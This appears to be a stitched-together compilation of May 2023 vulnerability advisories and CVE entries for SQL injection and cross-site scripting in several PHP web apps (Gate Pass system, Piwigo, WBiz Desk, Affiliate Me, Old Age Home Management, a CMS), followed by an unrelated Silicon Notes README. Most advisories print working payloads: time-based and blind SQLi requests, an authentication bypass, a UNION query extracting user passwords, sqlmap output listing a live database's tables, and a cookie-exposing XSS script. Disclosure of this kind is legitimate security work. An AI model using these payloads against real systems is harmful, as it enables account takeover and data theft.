SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

CVE-2023-31752: bug_report/SQLi-2.md at main · 4O4NtFd/bug_report

## Summary

Sqlite-jdbc addresses a remote code execution vulnerability via JDBC URL. 

## Impacted versions : 

3.6.14.1-3.41.2.1

## References

https://github.com/xerial/sqlite-jdbc/releases/tag/3.41.2.2

**Sqlite-jdbc vulnerable to remote code execution when JDBC url is attacker controlled**

High severity GitHub Reviewed Published May 23, 2023 in xerial/sqlite-jdbc • Updated May 23, 2023

GHSA-6phf-6h5g-97j2: Sqlite-jdbc vulnerable to remote code execution when JDBC url is attacker controlled

Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php.

Before replicating this vulnerability, you need to first create a new album and access the "photos\_add" function, and choose to create a new album  
  
//like this  

Then,accessing permalinks functionality  

click this  

Select the album you just created and use 'burp' to intercept this request  

You can see this' cat\_id 'parameter, which is where SQL injection exists  

We are trying to add a single quotation mark to trigger an error in MySQL  

We can also directly try using the sleep () function to trigger a delay  

It is not difficult to find that there is an SQL injection here. Next, we will analyze this problem from the code level.  
The vulnerability arises from '/admin/permalinks.php'  
//Start Here  

In our data package, we passed in the "set\_permalink" and “cat\_ Id"parameter, and "cat\_id"is greater than 0, so we can enter this if branch  

Then, because we passed in the 'permalink' parameter, we actually entered the internal else branch  

Then we try to analyze the set\_cat\_permalink() function.（In /admin/include/functions\_permalinks.php）  

In the end, we can find this SQL statement, where '$cat\_id' is passed directly into the SQL statement without any filtering.It is precisely this location that caused SQL injection  

This vulnerability exists in version 13.6.0, and it is uncertain whether this issue exists in earlier versions

CVE-2023-33361: There is a SQL Injection in the "permalinks" function of piwigo · Issue #1910 · Piwigo/Piwigo

Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.

Accessing the 'profile' page  

Add the 'user\_id' parameter with single quotes  

Discovering an error in MySQL can actually prove the existence of SQL injection, but we can still try using the sleep() function for testing  
  

//Try to analyze how this vulnerability was generated from a code level perspective.  

First find '/admin/profile.php'  

Track build\_user() function (in the /Piwigo/include/functions\_user.inc.php)  

The '$user\_id' enters the getuserdata() function, so continue tracking getuserdata()  

Finally, the '$user\_id' variable will enter this string of SQL statements, which clearly does not filter the incoming parameter values, resulting in SQL injection  

This vulnerability affects the latest version up to 13.6.0, and it is uncertain whether other versions will be affected.

CVE-2023-33362: There is a SQL Injection in the "profile" function of piwigo · Issue #1911 · Piwigo/Piwigo

WBiz Desk version 1.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phpGET parameter 'tk' is vulnerable to RXSShttp://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb[-] Done

WBiz Desk 1.2 Cross Site Scripting

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phphttp://website/ticket.php?tk=1&idtk=[SQLi]&action=closeGET parameter 'idtk' is vulnerable to SQL Injection---Parameter: idtk (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close---[+] Starting the Attackfetching current databasecurrent database: 'wbizdesk_*****_com_br'fetching tables[12 tables]+----------------+| accounts       || category       || chat           || config         || customers      || departments    || email_template || log_tb         || messages       || tickets        || tutorial       || users          |+----------------+fetching columns for table 'customers'[19 columns]+--------------+-------------------+| Column       | Type              |+--------------+-------------------+| name         | varchar(160)      || number       | varchar(11)       || status       | enum('S','B','N') || address      | varchar(255)      || city         | varchar(160)      || company      | varchar(160)      || country      | varchar(60)       || cpf_cnpj     | varchar(60)       || email        | varchar(255)      || id           | int(11)           || ip           | varchar(90)       || neighborhood | varchar(160)      || obs          | text              || os           | varchar(160)      || pass         | varchar(160)      || phrase       | varchar(160)      || salt         | varchar(255)      || state        | varchar(160)      || zipcode      | varchar(60)       |+--------------+-------------------+[-] Done

WBiz Desk 1.2 SQL Injection

Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection[#] Exploit Date: May 16, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: Affiliate Me[#] Application Version: 5.0.1[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]/admin.php?show=reply&id=[Injected Query][#] 3xample:[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -[#] Notes:- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.

Affiliate Me 5.0.1 SQL Injection

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID\=n8igimmg4o7ddmpnbfueujouvg
Content\-Length: 62
Cache\-Control: max\-age\=0
Sec\-Ch\-Ua: "Not:A-Brand";v\="99", "Chromium";v\="112"
Sec\-Ch\-Ua\-Mobile: ?0
Sec\-Ch\-Ua\-Platform: "Windows"
Upgrade\-Insecure\-Requests: 1
Origin: https://pwnedhost.com
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>
  
  <title>Old Age Home Management System|| Dashboard</title>
  
  <link rel="stylesheet" href="vendors/typicons/typicons.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  
  
</head>

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

IT Sourcecode Content Management System Project In PHP and MySQL With Source Code 1.0.0 is vulnerable to Cross Site Scripting (XSS) via /ecodesource/search_list.php.

**Content-Management-Systemv1.0-has-Cross-site-Scripting-XSS-**

Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

Vul\_Author: TzssZ

vendors: https://itsourcecode.com/free-projects/php-project/content-management-system-in-php-with-source-code/

Vulnerability File: /ecodesource/search\_list.php

Vulnerability location: POST /ecodesource/search\_list.php HTTP/1.1\\r\\n

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert: 

When you enter the system,click 'search' 

input a XSS script in input boxes,such as "<script>alert(document.cookie)</script>",it will expose cookie.

click search,and you will obtain its cookie.

CVE-2023-31816: GitHub - TzssZ/Content-Management-System-v1.0-has-Cross-site-Scripting-XSS-: Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field.

**What's all this, then?!**

Silicon Notes: A somewhat lightweight, low-friction personal knowledge base.

Features:

*   Plaintext editing in Markdown, rendering in HTML
*   Language syntax highlighting in rendered HTML
*   Bi-directional page relationships
*   Powerful full-text and page title search
*   Page history
*   A table of contents in the left sidebar, where it belongs
*   A quite-usable mobile layout
*   Built-in documentation
*   No-frills UI
*   No big frameworks, just a few smallish dependencies

For the rationale on why this was created and paper-thin justifications on certain design decisions, see this blog article.

  **Tech Stack**

Projects we rely on and appreciate!

*   Python, of course.
*   Poetry for project management.
*   Flask, the micro-framework.
*   Mistune to render Markdown into HTML.
*   Pygments for syntax highlighting of code blocks.
*   python-slugify creates URL-friendly "slugs" from strings.
*   python-dotenv for configuration management.
*   Gunicorn for deployment.
*   Pytest and Beautiful Soup for functional testing.
*   CodeMirror (optional) for editor syntax highlighting

**Quickstart**

This project is configured and deployed much like any other Flask project. For details, see the Flask configuration handling Docs.

**Docker or Podman**

If you want to take this for a quick spin, the following commands should get you going. You obviously need to have Docker installed. (If you have Podman, simply substitute docker for podman.)

docker run \\
  -ti \\
  --rm \\
  -p 127.0.0.1:5000:5000 \\
  -v silicon\_instance:/home/silicon/instance \\
  docker.io/bityard/silicon

And then open http://localhost:5000/ with your local web browser.

You could also start it with docker-compose (or docker compose):

cd deploy/docker-local
docker-compose up

If you want to build the image, a Dockerfile and a docker-compose.yaml file are provided, so you can build the container with:

docker build -t docker.io/bityard/silicon .

Or with buildah:

buildah build --format docker -t docker.io/bityard/silicon .

Silicon will listen on port 5000 (plaintext HTTP) and stores all application data in /home/silicon/instance.

**Development****Prerequisites**

This project requires Python 3.9 or greater. On a Debian/Ubuntu system, that means the following packages:

*   python3
*   python3-pip (unless installed via other means)
*   python3-dev
*   python3-venv
*   npm (or docker) (optional to enable CodeMirror editor)

Install Poetry if necessary. Everyone has their own way of setting up their Python tooling but I'm a fan of pipx:

pip3 install --user pipx
pipx install poetry

**Setup**

Use poetry to create a virtual environment and install the dependencies:

Flask is configured via environment variables. There is a file called .flaskenv which sets the name of the app. If you want to run flask from somewhere else, you will need to set:

All other settings can either be set as environment variables or written to a file named .env in the project root. For development, this will suffice:

FLASK\_ENV=development
WERKZEUG\_DEBUG\_PIN=off

You can set any environment variables mentioned in the Flask or Werkzeug docs, but these are some you might care to know about:

*   FLASK_ENV: production (default), or development
*   FLASK_RUN_HOST: defaults to 127.0.0.1
*   FLASK_RUN_PORT: defaults to 5000
*   INSTANCE_PATH: where the silicon data (in particular the database) is stored
*   WERKZEUG_DEBUG_PIN: the PIN to enable the Werkzeug debug console. Set to "off" to disable it if you are sure the app is only listening on localhost.
*   SECRET_KEY: A string used in session cookies. For development purposes, this can be anything, but for production it should be a 16-byte (or larger) string of random characters. Setting this is optional as the app will create one (and write it to a file in INSTANCE_PATH) if one doesn't exist.
*   SILICON_EDITOR: When set to textarea, this disables the CodeMirror text editor when editing pages and uses a standard textarea element instead.

To initialize the database after the configuration settings have been set, run the following command. It will create an instance directory in the root of the project and initialize the SQLite database from schema.sql.

**Running Silicon**

Run the project via the flask development server:

Unless you changed the defaults, you should be able to access the UI on http://localhost:5000/

**Running tests and flake8**

To run the tests, install the dev dependencies and run pytest:

poetry install --with dev
poetry run pytest

If you have a tmpfs filesystem, you can set the TMP environment variable to have test databases created there (which is faster and results in less wear-and-tear on your disk):

TMP=/dev/shm poetry run pytest

To make sure all code is formatted to flake8 standards, run flake8:

**Production Deployment**

Silicon Notes is a fairly simple web application which contains no built-in authentication or authorization mechanisms whatsoever. If deploying the application on its own, you should only deploy this to a trusted private network such as a local LAN segregated from the public Internet by a firewall or VPN. **If deploying on a public server, you are responsible for ensuring all access to it is secure.**

The deploy direcctory contains various sample deployments that may be helpful as starting points for a production deployment.

Normally, it is easiest to host applications like this on their own domain or subdomain, such as https://silicon.example.com/. If you would rather host it under a prefix instead (as in https://example.com/silicon), see this issue for hints on how to do that.

**Configuring the CodeMirror Editor**

Support for CodeMirror as a text editor is included by default. It does add a lot of "heft" to the UI, mostly around having to make a separate network request for each language and addon specified. To use it, you also have to install third-party Javascript/CSS static packages by running ONE of the following commands:

# If you have \`npm\` installed locally
(cd silicon/static && npm install)

Or:

# if you have \`docker\` installed
docker run -ti --rm -v $PWD/silicon/static:/app -w /app node:alpine npm install

Currently only a handful of languages are enabled for syntax highlighting, if you want to edit the list to suit your needs, you can edit silicon/static/js/edit.js. You can find a list of supported lanauges here.

To disable CodeMirror and use a regular textarea instead, add the following to your .env file or environment:

**Data Export and Import****SQL**

In the event that a database migration is needed, follow these steps:

1.  Stop the Silicon instance.
2.  Pull down the latest version of this repository.
3.  Run scripts/dump.sh > silicon_data.sql.

To import the data:

4.  Move or rename the old instance/silicon.sqlite, if it exists.
5.  Run poetry run flask init-db.
6.  Run sqlite3 instance/silicon.sqlite < silicon_data.sql.
7.  Start the Silicon instance.

Once you are satisfied that there are no issues, you can archive (or delete) the old silicon.sqlite file and silicon_data.sql.

**JSON**

If you want to dump your data as JSON (perhaps to import into another system or hack on with your own tools), these scripts are not well tested but might do the job.

Export:

#!/usr/bin/env sh

DB=instance/silicon.sqlite

for table in pages relationships; do
    sqlite3 $DB -cmd '.mode json' "select \* from $table;" \> $table.json
done

Import:

#!/usr/bin/env sh

sqlite3 instance/silicon.sqlite << EOF
INSERT INTO pages (revision, title, body)
SELECT
    json\_extract(value, '$.revision'),
    json\_extract(value, '$.title'),
    json\_extract(value, '$.body')
FROM json\_each(readfile('pages.json'));
INSERT INTO relationships
SELECT
    json\_extract(value, '$.title\_a'),
    json\_extract(value, '$.title\_a')
FROM json\_each(readfile('relationships.json'));
EOF

**Suggested Contributions****Clean Up CSS**

The current style sheets were more or less arrived at by trial and error. Any help in organizing the rules in a more coherent yet extensible way would be much appreciated.

**Dark Theme**

It would be nice if the CSS adjusted itself to a dark theme based on the preference set by the user in the browser. This should be pretty easy since almost all of the colors are in one file.

**Clean up Javascript**

To put it mildly, my JS skills are not the best. I would very much appreciate any suggestions on improvements to the small amount of code there is, or whether there is a better way to organize it. I won't bring in any kind of Javascript "build" tool as a project dependency, though.

**Diffs Between Revisions**

This is pretty standard on wiki-like apps, but it's not a critical feature for me so I haven't yet mustered up the fortitude to implement it. (It would also likely involve adding a diff library as a dependency.)

**Redirect to Slugified URL**

We currently "slugify" the page title in at least two places:

1.  When building the URL for an internal page link generated from wiki link syntax [[like this]] in render.py.
2.  When processing requests with page titles in the URLs for certain routes in views.py.

In the second case, page titles are slugified immediately, meaning every instance of the page title is slugified in the HTML. However, the URL will still contain the non-slugified title. This is pretty much purely cosmetic, but it would be nice if the application could immediately redirect to a slugified page title instead, if necessary.

I found lots of ugly ways to do this but nothing I was comfortable shipping.

**Draft Feature / Autosave / Leap-frog Detection**

To prevent the loss of unsaved changes while editing, we use the browser's "are you sure?" nag if there has been a change to the editing area since the page was loaded. However, there are still (at least) two opportunies to lose work:

1.  The browser crashes.
2.  Two simulatenous edits of a page in separate tabs or windows.

The first is rare and the second is not as serious since both revisions are saved. But it is currently up to the user to recognize what happened and remedy the situation by hand.

These are technically three separate features but I believe they would be quite closely coupled if implemented together.

**Refine Tests**

The tests directory contains functional tests that were deemed the most important. But they could be better organized and optimized/flexible. Code coverage is not likely very high. Some tests are lacking or missing because I was not able to work out the right way to test certain things.

**Add Anchors to Headings**

Anchors on headers are a very common feature on various CMSes. They let you link directly to headings, e.g.:

http://example.com/view/page\_title#some-section

**Implement a (Better) Task List Plugin**

Mistune (the Markdown->HTML renderer) ships with a task\_lists plugin. It is functional, but it renders task list items inside an ordinary <ol> as just another kind of list item. This means the task list items get prefixed with _both_ a bullet point and a checkbox. IMO, this is fairly ugly and the "right" way to display a task list item is the have the checkbox replace the bullet point.

To do this right, I think task lists should be their own separate kind of list rather than just another item type in regular lists. It should be possible to accomplish this with a Mistune plugin.

Tag

#sql